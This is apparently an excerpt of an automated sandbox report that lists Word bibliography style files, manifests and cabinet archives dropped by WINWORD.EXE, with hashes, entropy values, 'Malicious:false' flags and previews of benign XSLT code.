                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                        C:\Users\user\AppData\Local\Temp\TCDAD61.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):302
                        Entropy (8bit):3.537169234443227
                        Encrypted:false
                        SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                        MD5:9C00979164E78E3B890E56BE2DF00666
                        SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                        SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                        SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAD61.tmp\iso690nmerical.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):217137
                        Entropy (8bit):5.068335381017074
                        Encrypted:false
                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                        C:\Users\user\AppData\Local\Temp\TCDAD91.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):286
                        Entropy (8bit):3.5502940710609354
                        Encrypted:false
                        SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                        MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                        SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                        SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                        SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAD91.tmp\iso690.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):270198
                        Entropy (8bit):5.073814698282113
                        Encrypted:false
                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                        C:\Users\user\AppData\Local\Temp\TCDAD92.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):292
                        Entropy (8bit):3.5026803317779778
                        Encrypted:false
                        SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                        MD5:A0D51783BFEE86F3AC46A810404B6796
                        SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                        SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                        SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAD92.tmp\gosttitle.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):251032
                        Entropy (8bit):5.102652100491927
                        Encrypted:false
                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                        MD5:F425D8C274A8571B625EE66A8CE60287
                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                        C:\Users\user\AppData\Local\Temp\TCDAD93.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):314
                        Entropy (8bit):3.5230842510951934
                        Encrypted:false
                        SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                        MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                        SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                        SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                        SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAD93.tmp\ieee2006officeonline.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):294178
                        Entropy (8bit):4.977758311135714
                        Encrypted:false
                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                        C:\Users\user\AppData\Local\Temp\TCDAD94.tmp\APASixthEditionOfficeOnline.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):333258
                        Entropy (8bit):4.654450340871081
                        Encrypted:false
                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                        MD5:5632C4A81D2193986ACD29EADF1A2177
                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                        C:\Users\user\AppData\Local\Temp\TCDAD94.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):328
                        Entropy (8bit):3.541819892045459
                        Encrypted:false
                        SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                        MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                        SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                        SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                        SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDADC4.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:modified
                        Size (bytes):332
                        Entropy (8bit):3.547857457374301
                        Encrypted:false
                        SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                        MD5:4EC6724CBBA516CF202A6BD17226D02C
                        SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                        SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                        SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDADC4.tmp\harvardanglia2008officeonline.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):284415
                        Entropy (8bit):5.00549404077789
                        Encrypted:false
                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                        MD5:33A829B4893044E1851725F4DAF20271
                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                        C:\Users\user\AppData\Local\Temp\cabABB7.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31835
                        Entropy (8bit):7.81952379746457
                        Encrypted:false
                        SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                        MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                        SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                        SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                        SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                        Malicious:false
                        Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..

                        C:\Users\user\AppData\Local\Temp\cabABE7.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31605
                        Entropy (8bit):7.820497014278096
                        Encrypted:false
                        SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                        MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                        SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                        SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                        SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                        Malicious:false
                        Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....

                        C:\Users\user\AppData\Local\Temp\cabAC57.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31471
                        Entropy (8bit):7.818389271364328
                        Encrypted:false
                        SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                        MD5:91AADBEC4171CFA8292B618492F5EF34
                        SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                        SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                        SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                        Malicious:false
                        Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....

                        C:\Users\user\AppData\Local\Temp\cabAC58.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):35519
                        Entropy (8bit):7.846686335981972
                        Encrypted:false
                        SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                        MD5:53EE9DA49D0B84357038ECF376838D2E
                        SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                        SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                        SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                        Malicious:false
